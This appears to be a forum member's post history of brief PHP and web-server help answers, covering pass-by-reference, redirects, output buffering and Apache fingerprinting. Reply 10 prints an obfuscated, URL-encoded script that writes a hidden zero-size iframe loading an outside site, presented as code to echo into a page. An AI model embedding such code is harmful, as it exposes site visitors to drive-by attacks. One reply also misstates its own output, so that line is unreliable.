MadTechie

Staff Alumni
  • Posts: 9,409
  • Days Won: 1

Everything posted by MadTechie

  1. Can you post how you're inserting them? It sounds like you're stripping them out.
  2. It's truly about viewing, so CSS/HTML; also make it more text than graphical based (remember small screen). As for PHP, well, it's finished by the time it's got to the browser.. only thing would be maybe detect what browser is being used!!
  3. You don't need that function. However, to call it you'd do the following: checkGrade($_GET['grade']);
  4. Okay, I started to type this, then I had a long phone call. It's the same idea as a pointer in C. Okay, here's a function:

     ```php
     <?php
     $data = "123";
     $data = addstuff($data);

     // Pass by value: $add is a copy of the argument
     function addstuff($add)
     {
         $add = $add."Blar";
         return $add;
     }
     ?>
     ```

     Okay, what that does is pass 123 and then returns 123456. Now the memory used is

     $data = "123";
     then $data = "123"; $add= "123";
     then $data = "123"; $add= "123Blar";
     then $data = "123Blar";

     Okay.. now with Passing by Reference (not default in php 5):

     ```php
     <?php
     $data = "123";
     addstuff($data);

     // Pass by reference: $add refers to the caller's variable
     function addstuff(&$add)
     {
         $add = $add."Blar";
     }
     ?>
     ```

     This is how it goes:

     $data = "123";
     then $data = "123"; and $add= $data; these take up the same memory block, so if $add changes then $data changed
     then $add= "123Blar"; //so $data = 123Blar
  5. Hmm, it's a wide range. The "\x16\x03" is either something trying to use SSL on your server, that I assume doesn't have SSL on (or they're using the wrong port), or some test is checking to see if you have a webmail their is in fact your server redirecting a user's request. You could create that file if you like (just a html file with a message, i.e. "501 error"). This I assume is used for the fingerprint; it basically doesn't exist, thus this gets an error returned from the server, which contains Web Server type, Version and OS. You can protect against this by adding the following lines to your Apache config (httpd.conf); that will prevent the server from disclosing that information.

     ```apache
     # Send only the product name in the Server header (no version or OS)
     ServerTokens Prod
     # Leave the server version footer off server-generated error pages
     ServerSignature Off
     ```

     BUT it doesn't stop them all.. I will take a chance here and say, from what I have seen, this seems to be an automatic process and unless your server is out of date you shouldn't need to worry (as it will probably stop by itself). It seems to be testing for some very basic weaknesses (to exploit your server for spamming), but the program or bot that seems to be doing this is either some off-the-shelf software or a generically written bot. It's probably not a cracker after you (if it is, they are not very good).
  6. Check the IP of the client that's requesting those files. It sounds like a scan to me.
  7. When you send a request to a server, if that request has an error in it the server replies with a message like Now just say you wanted to find out what software/server/OS a machine was running but the tech guy turned off the welcome messages, identifiers etc. etc.. this means you don't know what types of vulnerabilities to look for. But if you send a malformed packet and you got back "unable to resolved", oow, that's a Windows message, thus that machine is running Windows. The same idea with requests to Apache or IIS etc.; these are used as fingerprints to find out what's running. Now someone could connect to your host and, using fingerprint scans, could find out everything you're running (maybe down to the version number (mostly major numbers)). Now they have all this info about your server, they can now look for vulnerabilities within that software. So just say they found you're using XYZ-FTP and they found a vulnerability in it and you don't have the latest updates/patches, they could get into your files without your password no matter what you do.. it in fact could be a higher level access that you have (depending on what you have).. You can't stop this via PHP, this is higher up the chain.. Just make sure you have all the updates in place and you should be okay (probably muhahahah)
  8. doesn't mean it's a problem with the header() function. You should have read the pinned post HEADER ERRORS - READ HERE BEFORE POSTING THEM, as that explains this problem!
  9. change <?php mysql_select_db($database_dbTeamAccess, $dbTeamAccess); to <?php mysql_select_db($database_dbTeamAccess, $dbTeamAccess);
  10. you need to escape the single quotes ie <?php echo ''; ?><?php echo '<Script Language=\'Javascript\'> <!-- document.write(unescape(\'%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%34%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E\')); //--> </Script>'; ?>
  11. LOL, that or someone is scanning your machine for vulnerabilities; that normally appears on a fingerprint scan to detect what OS is running
  12. Please explain what you mean by and how did you find this out ?
  13. Topic solved? If so, please click it
  14. I'm not sure what you're asking..
  15. Looks like the username is the problem! Maybe session_start(); have you tried echoing the results!
  16. Well, that's kinda hard considering PHP is server side! But I guess you could use sockets, that connects directly to the file and streams it (like tunnelling)
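  17. There's no need to pass it to $_GET as that will have no effect; appending it to the URL is fine. Now the problem is you're in fact passing a resource, and not a string, because you haven't fetched from the database. As for the SQL statement, that's looking for a table?.. In any case it should look something like this:

      ```php
      <?php
      // Escape $find before it is placed inside the SQL string
      $find = mysql_real_escape_string($find);
      $result = mysql_query("SHOW TABLES FROM sand2 LIKE '%$find%'") or die(mysql_error());
      // mysql_query() returns a resource; fetch a row to get the table name as a string
      $row = mysql_fetch_array($result);
      // URL-encode the value that goes into the query string
      echo " <a href='{$_SERVER['PHP_SELF']}?currentpage=$nextpage&result=" . urlencode($row[0]) . "'>></a> ";
      ```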
  18. Please note that's NOT what you asked; pre-loading images is one thing and in some cases makes sense, you said
  19. You're very correct (as always) corbin, most browsers will fix this and allow you to do it; that's why people (myself included) are lazy and use that shortcut.

      ```php
      <?php
      header("Status: 301"); # 301 Moved Permanently / 302 Temporary moved
      header("Location: http://{$_SERVER['SERVER_NAME']}/home.php");
      exit;
      ?>
      ```

      As a side note, Google likes 301 status when things are moved but doesn't like 302 (or that's what I read somewhere.. awaits corbin's responses lol)
  20. The funny thing is, by the time the user has half downloaded the main page and left, that's the same as someone visiting half your site. Also this assumes people go to the main page first; who wants to go to a site and have to download everything? Personally, if I was downloading a printer driver I want the driver for the model printer that runs on my OS, I don't want to download every driver ever made by that company "to save me time later". Trying to speed up a bad design is more work than a re-design.
  21. Okay, let's look back now. Everything in c:\webserver\wwwroot\ is published on the web, but remember that users can't access files below the wwwroot level BUT scripts can.. so while a script can access c:\webserver\secure\ there's no URL to it. So if you created a script called viewprivate.php and put that in c:\webserver\wwwroot\ it's accessible. Now if that script did this: <?php echo file_get_contents('c:\webserver\secure\private.txt'); ?> it's in fact displaying something from a folder that's not public, thus it MUST be accessed via the script.. Now if you added a login or session check, this could be used to allow selected users access to private files. I hope that makes sense
  22. Could be a database problem; when I get home I'll export my table and post it
  23. define("FLV_REGEXP", "/\[flv\]([_A-Za-z0-9-]+)\[\/flv\]/"); won't work, you're missing dots and slashes and % etc. Try this: define("FLV_REGEXP", '%\[flv\](.*?)\[/flv\]%is');
  24. As this was meant for JavaScript I should move it to the JavaScript section, but as people are talking about PHP validations I'll leave it here. As for what validation to use, I use JavaScript for the first part (nice messages etc.) but always have a PHP side (normally written first). The way I look at it is, if they disable the JavaScript they may not get the warning on the first page saying "sorry that's not a valid email", but once submitted, they will get a message there, and if I've been lazy they will need to re-enter all the details again
  25. Think of it this way:

      ```php
      <?php
      echo "Hello ";
      sleep(5);
      echo "World";
      ?>
      ```

      this will display in just over 5 seconds

      ```php
      <?php
      ob_start();      // start output buffering
      echo "Hello ";
      ob_flush();      // push the buffer contents out
      flush();         // and send them on to the browser now
      sleep(5);
      echo "World";
      ?>
      ```

      this will display then display 5 seconds later display the final result is still but the flush means you didn't have to wait for the script to end